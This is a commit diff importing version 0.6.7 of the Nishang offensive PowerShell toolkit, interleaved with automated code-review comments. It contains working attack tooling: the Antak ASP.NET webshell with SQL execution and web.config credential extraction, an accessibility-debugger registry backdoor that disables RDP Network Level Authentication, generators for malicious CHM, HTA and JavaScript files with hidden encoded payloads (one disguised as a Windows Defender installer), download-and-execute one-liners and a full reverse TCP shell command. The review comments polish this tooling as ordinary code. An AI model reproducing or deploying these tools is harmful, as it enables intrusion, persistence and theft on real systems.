Commit 38b2151c authored by Sophie Brun's avatar Sophie Brun

Imported Upstream version 0.6.7

parent 51f02a27
function Get-Unconstrained {
<#
.SYNOPSIS
Nishang script which searches computers in current domain which have Unconstrained Delegation Enabled.
.DESCRIPTION
The script searches in the current domain for computers which have Unconstrained Delegation enabled.
The script needs to be run from an elevated shell. It requires ActiveDirectory module available with RSAT-AD-PowerShell
Windows feature. The feature and module are auto-enabled by the script on a Windows Server 2012 machine.
The commands used in this post are taken from this post https://adsecurity.org/?p=1667
.PARAMETER Details
Returns more detailed description of the computer with Unconstrained delegation.
.EXAMPLE
PS > Get-Unconstrained
Use above command to search for computers which have unconstrained delegation enabled. Shows name of the computers.
.EXAMPLE
PS > Get-Unconstrained -Details
Use above command to search for computers which have unconstrained delegation enabled. Shows detailed output.
.LINK
http://www.labofapenetrationtester.com/2016/02/getting-domain-admin-with-kerberos-unconstrained-delegation.html
https://adsecurity.org/?p=1667
https://github.com/samratashok/nishang
#>
[CmdletBinding()] Param (
[Parameter(Position = 0, Mandatory=$False)]
[Switch]
$Detailed
)
# Check if User is Elevated
$currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -ne $true)
{
Write-Warning "Run the Command as an Administrator"
break
}
#Check for Server 2012
$OSVersion = (Get-WmiObject -Class win32_OperatingSystem).BuildNumber
if($OSVersion -notmatch 96)
{
Write-Warning "This script needs ActiveDirectory module which is available in Server 2012 with RSAT-AD-PowerShell. For other Window versions, you need to install the module manually."
}
else
{
Write-Verbose "Running on Server 2012"
}
#Check if the Windows feature is already installed
if((Get-WindowsFeature -Name RSAT-AD-PowerShell).InstallState -ne "Installed")
{
Write-Warning "Required module not found. Installing it."
Add-WindowsFeature -Name RSAT-AD-Powershell -Verbose
}
else
{
Write-Verbose "Required module found. Continuing.."
}
#Import the required module
Write-Verbose "Importing the ActiveDirectory Module"
Import-Module ActiveDirectory
#Search for Unconstrained delegation
Write-Output "Searching for domain computers with Unconstrained Delegation"
$computer = Get-ADComputer -Filter {(TrustedForDelegation -eq $True) -and (PrimaryGroupID -eq 515)}
if ($Detailed)
{
Get-ADComputer $computer.Name -Properties *
}
else
{
$computer.DnsHostName
}
}
\ No newline at end of file
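Review bot: The help block documents `.PARAMETER Details`, but the switch declared in the Param block and tested in `if ($Detailed)` is `$Detailed`, so Get-Help will describe a parameter that does not exist; the entry should read `.PARAMETER Detailed`. `Get-ADComputer $computer.Name -Properties *` hands the whole result set to -Identity, which only works when exactly one computer matches; piping is the safe form, `$computer | Get-ADComputer -Properties *`. The `break` after `Write-Warning "Run the Command as an Administrator"` is not inside a loop, and in PowerShell that unwinds to the caller's enclosing pipeline or script instead of leaving only this function; `return` is what is meant here, and the same `break`-outside-a-loop appears in Out-CHM after the "Payload too big for CHM!" warning.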
......@@ -2,16 +2,34 @@
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.IO.Compression" %>
<%--Antak - A Webshell which utilizes powershell.--%>
<%@ Import Namespace="Microsoft.VisualBasic" %>
<%--Antak - A Webshell which utilizes PowerShell.--%>
<script Language="c#" runat="server">
protected override void OnInit(EventArgs e)
{
output.Text = @"Welcome to Antak - A Webshell in Powershell
protected void Login_Click(object sender, EventArgs e)
{
// WARNING: Don't be lazy, change values below for username and password. Default credentials are disastrous.
// Default Username is "Disclaimer" and Password is "ForLegitUseOnly" without quotes and case-sensitive.
if (Username.Text == "Disclaimer" && Password.Text == "ForLegitUseOnly")
{
execution.Visible = true;
execution.Enabled = true;
authentication.Visible = false;
output.Text = @"Welcome to Antak - A Webshell which utilizes PowerShell
Use help for more details.
Use clear to clear the screen.";
}
}
protected override void OnInit(EventArgs e)
{
execution.Visible = false;
execution.Enabled = false;
}
string do_ps(string arg)
{
//This section based on cmdasp webshell by http://michaeldaw.org
......@@ -35,7 +53,7 @@ void ps(object sender, System.EventArgs e)
output.Text = @"Use this shell as a normal powershell console. Each command is executed in a new process, keep this in mind
while using commands (like changing current directory or running session aware scripts).
Executing PowerShell scripts on the target -
- Scripts can be executed on the target using any of the below methods:
1. Paste the script in command textbox and click 'Encode and Execute'. A reasonably large script could be executed using this.
2. Use powershell one-liner (example below) for download & execute in the command box.
......@@ -46,21 +64,27 @@ IEX ((New-Object Net.WebClient).DownloadString('URL to script here')); [Argument
4. Make the script a semi-colon separated one-liner.
Files can be uploaded and downloaded using the respective buttons.
Uploading a file -
- Uploading a file:
To upload a file you must mention the actual path on server (with write permissions) in command textbox.
(OS temporary directory like C:\Windows\Temp may be writable.)
Then use Browse and Upload buttons to upload file to that path.
Downloading a file -
- Downloading a file:
To download a file enter the actual path on the server in command textbox.
Then click on Download button.
- SQL Queries could be executed by following below steps:
1. Click on 'Parse Web.Config' button to get dabase connection string. By default, Antak looks for web.config in
the C:\Inetpub directory. You can specify a full path in the command box to look for web.config in other directory.
2. Paste that connection string in the textbox besides the 'Execute SQL Query' button.
3. Enter the SQL Query in the command box.
4. Click the 'Execute SQL Query' button.
Antak is a part of Nishang and updates could be found here:
https://github.com/samratashok/nishang
A detailed blog post on Antak could be found here
http://www.labofapenetrationtester.com/2014/06/introducing-antak.html
Blog posts about Antak could be found here
http://www.labofapenetrationtester.com/search/label/Antak
";
console.Text = string.Empty;
......@@ -89,12 +113,18 @@ void execcommand(string cmd)
console.Focus();
}
void base64encode(object sender, System.EventArgs e)
void base64encode(string inputstr)
{
// Compression and encoding directly stolen from Compress-PostScript by Carlos Perez
//http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
string contents = console.Text;
if (inputstr != "null")
{
contents = inputstr;
}
// Compress Script
......@@ -124,7 +154,6 @@ void base64encode(object sender, System.EventArgs e)
execcommand(command);
}
protected void uploadbutton_Click(object sender, EventArgs e)
{
......@@ -164,29 +193,74 @@ protected void downloadbutton_Click(object sender, EventArgs e)
}
}
protected void encode_Click(object sender, EventArgs e)
{
base64encode("null");
}
// PowerShell logic in ConnectionStr_Click and executesql_Click taken from https://github.com/NetSPI/cmdsql
protected void ConnectionStr_Click(object sender, EventArgs e)
{
output.Text = @"By default, web.config is searched for in C:\inetpub. To look at other location, specify the full path in the command textbox.
";
string webpath = "C:\\inetpub";
if (console.Text != string.Empty)
{
webpath = console.Text;
}
string pscode = "$ErrorActionPreference = \'SilentlyContinue\';$path=" + "\"" + webpath + "\"" + ";" + "Foreach ($file in (get-childitem $path -Filter web.config -Recurse)) {; Try { $xml = [xml](get-content $file.FullName) } Catch { continue };Try { $connstrings = $xml.get_DocumentElement() } Catch { continue };if ($connstrings.ConnectionStrings.encrypteddata.cipherdata.ciphervalue -ne $null){;$tempdir = (Get-Date).Ticks;new-item $env:temp\\$tempdir -ItemType directory | out-null; copy-item $file.FullName $env:temp\\$tempdir;$aspnet_regiis = (get-childitem $env:windir\\microsoft.net\\ -Filter aspnet_regiis.exe -recurse | select-object -last 1).FullName + \' -pdf \"\"connectionStrings\"\" \' + $env:temp + \'\\\' + $tempdir;Invoke-Expression $aspnet_regiis; Try { $xml = [xml](get-content $env:temp\\$tempdir\\$file) } Catch { continue };Try { $connstrings = $xml.get_DocumentElement() } Catch { continue };remove-item $env:temp\\$tempdir -recurse};Foreach ($_ in $connstrings.ConnectionStrings.add) { if ($_.connectionString -ne $NULL) { write-host \"\"$file.Fullname --- $_.connectionString\"\"} } };";
base64encode(pscode);
}
protected void executesql_Click(object sender, EventArgs e)
{
output.Text = @"Use a connection string retrieved from the server and copy it in the connection string textbox.
";
string Constr = sqlconnectiostr.Text;
string sqlcmd = console.Text;
string pscode = "$Connection = New-Object System.Data.SQLClient.SQLConnection;$Connection.ConnectionString = " + "\"" + Constr + "\"" + ";" + "$Connection.Open();$Command = New-Object System.Data.SQLClient.SQLCommand;$Command.Connection = $Connection;$Command.CommandText = " + "\"" + sqlcmd + "\"" + ";" + "$Reader = $Command.ExecuteReader();while ($reader.Read()) {;New-Object PSObject -Property @{Name = $reader.GetValue(0)};};$Connection.Close()";
base64encode(pscode);
}
</script>
<HTML>
<HEAD>
<title>Antak Webshell</title>
</HEAD>
<body bgcolor="#808080">
<div>
<form id="Form1" method="post" runat="server" style="background-color: #808080">
<div style="text-align:center; resize:vertical">
<asp:Panel ID="authentication" runat="server" HorizontalAlign="Center" >
<asp:TextBox ID="Username" runat="server" style="margin-left: 0px" Width="300px"></asp:TextBox> <br />
<asp:TextBox ID="Password" runat="server" Width="300px"></asp:TextBox><br />
<asp:Button ID="Login" runat="server" Text="Login" OnClick="Login_Click" Width="101px"/><br />
</asp:Panel>
<asp:Panel ID="execution" runat="server" >
<div runat="server" style="text-align:center; resize:vertical">
<asp:TextBox ID="output" runat="server" TextMode="MultiLine" BackColor="#012456" ForeColor="White" style="height: 526px; width: 891px;" ReadOnly="True"></asp:TextBox>
<asp:TextBox ID="console" runat="server" BackColor="#012456" ForeColor="Yellow" Width="891px" TextMode="MultiLine" Rows="1" onkeydown="if(event.keyCode == 13) document.getElementById('cmd').click()" Height="23px" AutoCompleteType="None"></asp:TextBox>
</div>
<div style="width: 1100px; text-align:center">
<div runat="server" style="width: auto; text-align:center">
<asp:Button ID="cmd" runat="server" Text="Submit" OnClick="ps" />
<asp:FileUpload ID="upload" runat="server"/>
<asp:Button ID="uploadbutton" runat="server" Text="Upload the File" OnClick="uploadbutton_Click" />
<asp:Button ID="encode" runat="server" Text="Encode and Execute" OnClick="base64encode" />
<asp:Button ID="downloadbutton" runat="server" Text="Download" OnClick="downloadbutton_Click" />
<asp:Button ID="encode" runat="server" Text="Encode and Execute" OnClick="encode_Click"/>
<asp:Button ID="downloadbutton" runat="server" Text="Download" OnClick="downloadbutton_Click" /> <br />
<asp:Button ID="ConnectionStr" runat="server" Text="Parse web.config" OnClick="ConnectionStr_Click"/>
<asp:Button ID="executesql" runat="server" Text="Execute SQL Query" OnClick="executesql_Click" />
<asp:TextBox ID="sqlconnectiostr" runat="server" Width="352px">Enter Connection String here to Execute SQL Queries</asp:TextBox>
</div>
</asp:Panel >
</form>
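Review bot: In the `@@ -89,12 +113,18 @@` hunk, `base64encode(string inputstr)` uses the literal string `"null"` as a sentinel for "no override" (`if (inputstr != "null")`), and `encode_Click` in the `@@ -164` hunk passes `"null"` to trigger it; an input whose text is exactly `null` is misread, and the convention is opaque to a reader. Pass a real null instead: `string contents = inputstr ?? console.Text;` in `base64encode` and `base64encode(null);` in `encode_Click`. The body of `base64encode` continues past the hunk, so the rest of the method is not visible here. In the markup of the last hunk, `<asp:TextBox ID="Password" runat="server" Width="300px">` has no `TextMode="Password"`, so the typed value is echoed in clear text in the browser; add that attribute.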

function Add-RegBackdoor
{
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $False)]
[String]
$Payload = "cmd.exe"
)
#Disable Network Level Authentication
Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\" -Name SecurityLayer -Value 1
New-Item "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" -Name Debugger -Value $Payload
New-Item "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe"
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" -Name Debugger -Value $Payload
}
\ No newline at end of file
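Review bot: Add-RegBackdoor carries no comment-based help, unlike the other scripts in this commit (Get-Unconstrained, Out-CHM, Out-HTA and Out-JS each open with a `<# .SYNOPSIS … #>` block). A help block should state plainly which values the function changes — `SecurityLayer` under the RDP-Tcp WinStation key and the `Debugger` value under the two Image File Execution Options keys it creates — and that the previous values are neither recorded nor restored, so whoever runs it in a lab knows exactly what to revert. The `cmd.exe` default of `$Payload` belongs in a `.PARAMETER Payload` entry.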
......@@ -227,7 +227,7 @@ function DNS-TXT-Logic ($Startdomain, $cmdstring, $commanddomain, $psstring, $ps
if ($exfil -eq $True)
{
$pastename = $env:COMPUTERNAME + " Results of DNS TXT Pwnage: "
Do-Exfiltration "$pastename" "$pastevalue" "$ExfilOption" "$dev_key" "$username" "$password" "$URL" "$DomainName" "$ExfilNS"
Do-Exfiltration-Dns "$pastename" "$pastevalue" "$ExfilOption" "$dev_key" "$username" "$password" "$URL" "$DomainName" "$ExfilNS"
}
if ($exec -eq 1)
{
......@@ -278,7 +278,7 @@ function DNS-TXT-Logic ($Startdomain, $cmdstring, $commanddomain, $psstring, $ps
if ($exfil -eq $True)
{
$pastename = $env:COMPUTERNAME + " Results of DNS TXT Pwnage: "
Do-Exfiltration "$pastename" "$pastevalue" "$ExfilOption" "$dev_key" "$username" "$password" "$URL" "$DomainName" "$ExfilNS"
Do-Exfiltration-Dns "$pastename" "$pastevalue" "$ExfilOption" "$dev_key" "$username" "$password" "$URL" "$DomainName" "$ExfilNS"
}
if ($exec -eq 1)
{
......@@ -296,7 +296,7 @@ function DNS-TXT-Logic ($Startdomain, $cmdstring, $commanddomain, $psstring, $ps
'@
$exfiltration = @'
function Do-Exfiltration($pastename,$pastevalue,$ExfilOption,$dev_key,$username,$password,$URL,$DomainName,$ExfilNS)
function Do-Exfiltration-Dns($pastename,$pastevalue,$ExfilOption,$dev_key,$username,$password,$URL,$DomainName,$ExfilNS)
{
function post_http($url,$parameters)
{
......@@ -166,7 +166,7 @@ function Logic-Execute-OnTime ($PayloadURL, $Arguments, $time, $CheckURL, $StopS
$exec++
if ($exfil -eq $True)
{
Do-Exfiltration "$pastename" "$pastevalue" "$ExfilOption" "$dev_key" "$username" "$password" "$URL" "$DomainName" "$AuthNS"
Do-Exfiltration-Time "$pastename" "$pastevalue" "$ExfilOption" "$dev_key" "$username" "$password" "$URL" "$DomainName" "$AuthNS"
}
if ($exec -eq 1)
{
......@@ -184,7 +184,7 @@ function Logic-Execute-OnTime ($PayloadURL, $Arguments, $time, $CheckURL, $StopS
$exfiltration = @'
function Do-Exfiltration($pastename,$pastevalue,$ExfilOption,$dev_key,$username,$password,$URL,$DomainName,$AuthNS)
function Do-Exfiltration-Time($pastename,$pastevalue,$ExfilOption,$dev_key,$username,$password,$URL,$DomainName,$AuthNS)
{
function post_http($url,$parameters)
{
......@@ -186,7 +186,7 @@ function HTTP-Backdoor-Logic ($CheckURL, $PayloadURL, $Arguments, $MagicString,
if ($exfil -eq $True)
{
$pastename = $env:COMPUTERNAME + " Results of HTTP Backdoor: "
Do-Exfiltration "$pastename" "$pastevalue" "$ExfilOption" "$dev_key" "$username" "$password" "$URL" "$DomainName" "$AuthNS"
Do-Exfiltration-HTTP "$pastename" "$pastevalue" "$ExfilOption" "$dev_key" "$username" "$password" "$URL" "$DomainName" "$AuthNS"
}
if ($exec -eq 1)
{
......@@ -203,7 +203,7 @@ function HTTP-Backdoor-Logic ($CheckURL, $PayloadURL, $Arguments, $MagicString,
$exfiltration = @'
function Do-Exfiltration($pastename,$pastevalue,$ExfilOption,$dev_key,$username,$password,$URL,$DomainName,$ExfilNS)
function Do-Exfiltration-HTTP($pastename,$pastevalue,$ExfilOption,$dev_key,$username,$password,$URL,$DomainName,$ExfilNS)
{
function post_http($url,$parameters)
{
0.6.7
- Added Out-JS.ps1 in the Client directory.
- Added Out-SCT.ps1 in the Client directory.
- Added Invoke-JSRatRegsvr.ps1 in the Shells directory.
- Added Out-RundllCommand in the Execution directory.
0.6.6
- Added Invoke-JSRatRundll in the Shells directory.
0.6.5
- Updated Out-Word, Out-Excel, Out-HTA and Out-CHM. Now, scripts can directly be used as a payload.
- Updated Out-Word and Out-Excel. If a new document is now generated it tries to trick the target in enabling macros.
- Out-HTA uses inline VBScript now. A separate VBScirpt is not generated anymore.
0.6.4
- Added ActiveDirecotry directory.
- Added Get-UnConstrained.ps1 to the ActiveDirectory directory.
- Added Invoke-Mimikatz (mimikatz version 2.1 alpha 17/02//2016) to the Gather Directory.
0.6.3
- Added Invoke-Interceptor to the MITM directory.
0.6.2
- Added support for dumping cleartext credentials from RDP sessions for Invoke-MimikatzWfigestDowngrade.
0.6.1
- Added Show-TargetScreen to the Gather directory.
0.6.0
- Added Invoke-PsUACme to the Escalation directory.
0.5.9
- Added Get-PassHints to the Gather directory.
- Added Out-WebQuery and Get-PassHints to Powerpreter.
0.5.8
- Added Out-WebQuery to the Client directory.
- Added Start-CaptureServer to the Utility directory.
0.5.7
- Invoke-PoshRatHttps does not install root certificate anymore and certificate pinning is used.
- Added a disclaimer.
- Minor bugs in Powerpreter are fixed.
- Updates to Antak. Authentication and ability to execute SQL Queries added.
- Name of Do-Exfiltration changed in HTTP-Backdoor, DNS_TXT_Pwnage and Execute-On-Time
- Removed hard coded credentials from Invoke-PSGcat.ps1 and Invoke-PSGcat in Powerpreter. So embarrassing!
0.5.6
- Added Invoke-PowerShellIcmp to the Shells directory.
- Adjusted buffer for Invoke-PowerarShellTcp and Invoke-PowerShellUdp and one liners to show larger output.
0.5.5
- Added Invoke-PowerShellWmi to the Shells directory.
0.5.4
- Added Invoke-PoshRatHttps, Invoke-PosRatHttp and Remove-PoshRat to the Shells directory.
0.5.3
- Added Invoke-PowerShellUdp and Invoke-PowerShellUdpOneLiner to Shells directory.
0.5.2
- Added Invoke-PowerShellTcp and Invoke-PowerShellTcpOneLiner to Shells directory.
0.5.1
- Added Invoke-MimikatzWfigestDowngrade to Gather directory.
0.5.0.1
- Updated Powerpreter by adding Invoke_NetworkRelay and Gcat.
0.5.0
- Added Invoke-NetworkRelay to Pivot directory.
- Added Invoke-PsGcat and Invoke-PsGcatAgent to Shells directory.
......@@ -16,10 +16,17 @@ http://www.microsoft.com/en-us/download/details.aspx?id=21138
Payload which you want execute on the target.
.PARAMETER PayloadURL
URL of the powershell script which would be executed on the target.
URL of the PowerShell script which would be executed on the target.
.PARAMETER PayloadScript
Path to a PowerShell script on local machine.
Note that if the script expects any parameter passed to it, you must pass the parameters in the script itself.
.PARAMETER Arguments
Arguments to the powershell script to be executed on the target.
Arguments to the PowerShell script to be executed on the target.
.PARAMETER HHCPath
Path to the HTML Help Workshop on the attacker's machine.
.PARAMETER OutputPath
Path to the directory where the files would be saved. Default is the current directory.
......@@ -29,10 +36,18 @@ PS > Out-CHM -Payload "Get-Process" -HHCPath "C:\Program Files (x86)\HTML Help W
Above command would execute Get-Process on the target machine when the CHM file is opened.
.EXAMPLE
PS > Out-CHM -PayloadScript C:\nishang\Shells\Invoke-PowerShellTcpOneLine.ps1 -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
Use above when you want to use a PowerShell script as the payload. Note that if the script expects any parameter passed to it,
you must pass the parameters in the script itself.
.EXAMPLE
PS > Out-CHM -PayloadURL http://192.168.254.1/Get-Information.ps1 -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
Use above command to generate CHM file which download and execute the given powershell script in memory on target.
Use above command to generate CHM file which download and execute the given PowerShell script in memory on target.
.EXAMPLE
PS > Out-CHM -Payload "-EncodedCommand <>" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
......@@ -43,7 +58,7 @@ Use Invoke-Encode from Nishang to encode the command or script.
.EXAMPLE
PS > Out-CHM -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
Use above command to pass an argument to the powershell script/module.
Use above command to pass an argument to the PowerShell script/module.
.LINK
http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html
......@@ -68,13 +83,17 @@ https://twitter.com/ithurricanept/status/534993743196090368
[Parameter(Position = 2, Mandatory = $False)]
[String]
$PayloadScript,
[Parameter(Position = 3, Mandatory = $False)]
[String]
$Arguments,
[Parameter(Position = 3, Mandatory = $True)]
[Parameter(Position = 4, Mandatory = $True)]
[String]
$HHCPath,
[Parameter(Position = 4, Mandatory = $False)]
[Parameter(Position = 5, Mandatory = $False)]
[String]
$OutputPath="$pwd"
)
......@@ -85,6 +104,48 @@ https://twitter.com/ithurricanept/status/534993743196090368
$Payload = "IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments"
}
if($PayloadScript)
{
#Logic to read, compress and Base64 encode the payload script.
$Enc = Get-Content $PayloadScript -Encoding Ascii
#Compression logic from http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
$ms = New-Object IO.MemoryStream
$action = [IO.Compression.CompressionMode]::Compress
$cs = New-Object IO.Compression.DeflateStream ($ms,$action)
$sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII)
$Enc | ForEach-Object {$sw.WriteLine($_)}
$sw.Close()
# Base64 encode stream
$Compressed = [Convert]::ToBase64String($ms.ToArray())
$command = "Invoke-Expression `$(New-Object IO.StreamReader (" +
"`$(New-Object IO.Compression.DeflateStream (" +
"`$(New-Object IO.MemoryStream (,"+
"`$([Convert]::FromBase64String('$Compressed')))), " +
"[IO.Compression.CompressionMode]::Decompress)),"+
" [Text.Encoding]::ASCII)).ReadToEnd();"
#Generate Base64 encoded command to use with the powershell -encodedcommand paramter"
$UnicodeEncoder = New-Object System.Text.UnicodeEncoding
$EncScript = [Convert]::ToBase64String($UnicodeEncoder.GetBytes($command))
if ($EncScript.Length -gt 8100)
{
Write-Warning "Payload too big for CHM! Try a smaller payload."
break
}
else
{
$Payload = "powershell.exe -WindowStyle hidden -nologo -noprofile -e $EncScript"
}
}
#Create the table of contents for the CHM
$CHMTableOfContents = @"
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
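Review bot: The compression-and-encoding block added under `if($PayloadScript)` in the `@@ -85,6 +104,48 @@` hunk (from `$ms = New-Object IO.MemoryStream` through `$EncScript = [Convert]::ToBase64String(...)`) is duplicated line for line in Out-HTA's new `if($PayloadScript)` block in the same commit; factoring it into one shared helper that returns `$EncScript` would keep the two copies from drifting apart. The comment above the encoder has a stray quote and a typo: `#Generate Base64 encoded command to use with the powershell -encodedcommand paramter"` should read `#Generate Base64 encoded command to use with the powershell -EncodedCommand parameter`. Out-CHM's body continues past this hunk.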
......@@ -3,12 +3,15 @@ function Out-HTA
{
<#
.SYNOPSIS
Nishang script which could be used for generating HTML Application and accompanying VBscript. These could be deployed on
a web server and powershell scripts and commands could be executed on the target machine.
Nishang script which could be used for generating "infected" HTML Application. It could be deployed on
a web server and PowerShell scripts and commands could be executed on the target machine.
.DESCRIPTION
The script generates two files. A HTA file and a VBScript. The HTA and VBScript should be deployed in same directory of a web server.
When a target browses to the HTA file the VBScript is executed. This VBScript is used to execute powershell scripts and commands.
The script generates a HTA file with inline VBScript. The HTA should be deployed on a web server.
When a target browses to the HTA file and chooses to run it, PowerShell commands and scripts in it are executed.
The HTA is not visible as it is closed quickly. But in case, if the HTA becomes visible (for example in case of an error), it loads
a live page related to Windows Defender from Microsoft website to look legit.
.PARAMETER Payload
Payload which you want execute on the target.
......@@ -16,18 +19,15 @@ Payload which you want execute on the target.
.PARAMETER PayloadURL
URL of the powershell script which would be executed on the target.
.PARAMETER PayloadScript
Path to the PowerShell script to be encoded in the HTA which would be executed on the target.
.PARAMETER Arguments
Arguments to the powershell script to be executed on the target.
Arguments to the PowerShell script to be executed on the target.
.PARAMETER HTAFilePath
Path to the HTA file to be generated. Default is with the name WindDef_WebInstall.hta in the current directory.
.PARAMETER VBFilename
Name of the VBScript file to be generated, use without ".vbs" extension. Default is launchps.vbs.
.PARAMETER VBFilepath
Path to the HTA file to be generated. Default is with the name launchps.vbs in the current directory.
.EXAMPLE
PS > Out-HTA -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c Get-ChildItem"
......@@ -41,7 +41,7 @@ Use above command to generate HTA and VBS files which download and execute the g
.EXAMPLE
PS > Out-HTA -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM
Use above command to pass an argument to the powershell script/module.
Use above command to pass an argument to the PowerShell script/module.
.LINK
http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html
......@@ -59,37 +59,73 @@ https://github.com/samratashok/nishang
[String]
$PayloadURL,
[Parameter(Position = 2, Mandatory = $False)]
[String]
$Arguments,
$PayloadScript,
[Parameter(Position = 3, Mandatory = $False)]
[String]
$VBFilename="launchps.vbs",
$Arguments,
[Parameter(Position = 4, Mandatory = $False)]
[String]
$HTAFilePath="$pwd\WindDef_WebInstall.hta",
$HTAFilePath="$pwd\WindDef_WebInstall.hta"
[Parameter(Position = 5, Mandatory = $False)]
[String]
$VBFilepath="$pwd\launchps.vbs"
)
if(!$Payload)
{
$Payload = "powershell.exe -ExecutionPolicy Bypass -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments"
$Payload = "powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments"
}
if($PayloadScript)
{
#Logic to read, compress and Base64 encode the payload script.
$Enc = Get-Content $PayloadScript -Encoding Ascii
#Compression logic from http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
$ms = New-Object IO.MemoryStream
$action = [IO.Compression.CompressionMode]::Compress
$cs = New-Object IO.Compression.DeflateStream ($ms,$action)
$sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII)
$Enc | ForEach-Object {$sw.WriteLine($_)}
$sw.Close()
# Base64 encode stream
$Compressed = [Convert]::ToBase64String($ms.ToArray())
$command = "Invoke-Expression `$(New-Object IO.StreamReader (" +
"`$(New-Object IO.Compression.DeflateStream (" +
"`$(New-Object IO.MemoryStream (,"+
"`$([Convert]::FromBase64String('$Compressed')))), " +
"[IO.Compression.CompressionMode]::Decompress)),"+
" [Text.Encoding]::ASCII)).ReadToEnd();"
#Generate Base64 encoded command to use with the powershell -encodedcommand paramter"
$UnicodeEncoder = New-Object System.Text.UnicodeEncoding
$EncScript = [Convert]::ToBase64String($UnicodeEncoder.GetBytes($command))
$Payload = "powershell.exe -WindowStyle hidden -nologo -noprofile -e $EncScript"
}
$HTA = @"
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<title>Windows Defender Web Install</title>
<script src="$VBFilename" type="text/vbscript" >
<script language="VBScript">
set oShell = CreateObject("Wscript.Shell")
oShell.Run("$Payload"),0,true
self.close()
</script>
<hta:application
id="oHTA"
......@@ -98,34 +134,14 @@ https://github.com/samratashok/nishang
>
</hta:application>
</head>
<SCRIPT TYPE="text/javascript">
function start(){
Initialize();
}
//-->
</SCRIPT>
<div>
<object type="text/html" data="http://windows.microsoft.com/en-IN/windows7/products/features/windows-defender" width="100%" height="100%">
</object></div>
<body onload="start()">
<body>
</body>
</html>
"@
$vbsscript = @"
Sub Initialize()
Set oShell = CreateObject( "WScript.Shell" )
ps = "$Payload"
oShell.run(ps),0,true
End Sub
"@
Out-File -InputObject $HTA -FilePath $HTAFilepath
Out-File -InputObject $vbsscript -FilePath $VBFilepath
Write-Output "HTA and VBS written to $HTAFilepath and $VBFilepath respectively."
Write-Output "HTA written to $HTAFilepath."
}
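Review bot: The .EXAMPLE text visible in the `@@ -41,7 +41,7 @@` hunk header, "Use above command to generate HTA and VBS files which download and execute the g…", appears to be left untouched by this commit, while the `@@ -98,34 +134,14 @@` hunk removes the VBScript file and the closing message now reads `Write-Output "HTA written to $HTAFilepath."`; if that example line is indeed unchanged it is stale and should describe a single HTA file. The new `.PARAMETER PayloadScript` entry in the `@@ -16,18 +19,15 @@` hunk omits the caveat that Out-CHM's help gives for the same parameter ("if the script expects any parameter passed to it, you must pass the parameters in the script itself"); if the same constraint applies here, it should be repeated.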
function Out-JS
{
<#
.SYNOPSIS
Nishang script useful for creating "weaponized" JavaScript file which could be used to run PowerShell commands and scripts.
.DESCRIPTION
The script generates a JavaScript file. The JavaScript file (default name Style.js) needs to be sent to a target.
As soon as a target user opens the JS file, the specified payload will be executed.
.PARAMETER Payload
Payload which you want execute on the target.
.PARAMETER PayloadURL
URL of the PowerShell script which would be executed on the target.
.PARAMETER Arguments
Arguments to the PowerShell script to be executed on the target.
.PARAMETER OutputPath
Path to the directory where the files would be saved. Default is the current directory.
.EXAMPLE
PS > Out-JS -PayloadURL http://192.168.230.1/Invoke-PowerShellUdp.ps1 -Arguments "Invoke-PowerShellUdp -Reverse -IPAddress 192.168.230.154 -Port 53"
Use above when you want to use the default payload, which is a powershell download and execute one-liner. A file
named "Style.js" would be generated in the current directory.
PS > Out-JS -PayloadURL http://192.168.230.1/Powerpreter.psm1 -Arguments "Get-Information;Get-Wlan-Keys"
Use above command for multiple payloads.
PS > Out-JS -Payload "`$sm=(New-Object Net.Sockets.TCPClient('192.168.230.154',443)).GetStream();[byte[]]`$bt=0..65535|%{0};while((`$i=`$sm.Read(`$bt, 0, `$bt.Length)) -ne 0){;`$d=(New-Object Text.ASCIIEncoding).GetString(`$bt,0, `$i);`$sb=(iex `$d 2>&1 | Out-String );`$sb2=`$sb + 'PS ' + (pwd).Path + '> ';`$sb=([text.encoding]::ASCII).GetBytes(`$sb2);`$sm.Write(`$sb,0,`$sb.Length);`$sm.Flush()}"
Use above for a Reverse PowerShell Session. Note that there is no need of download-execute in this case.
.LINK
http://www.labofapenetrationtester.com/2016/05/practical-use-of-javascript-and-com-for-pentesting.html
https://github.com/samratashok/nishang
#>
[CmdletBinding()] Param(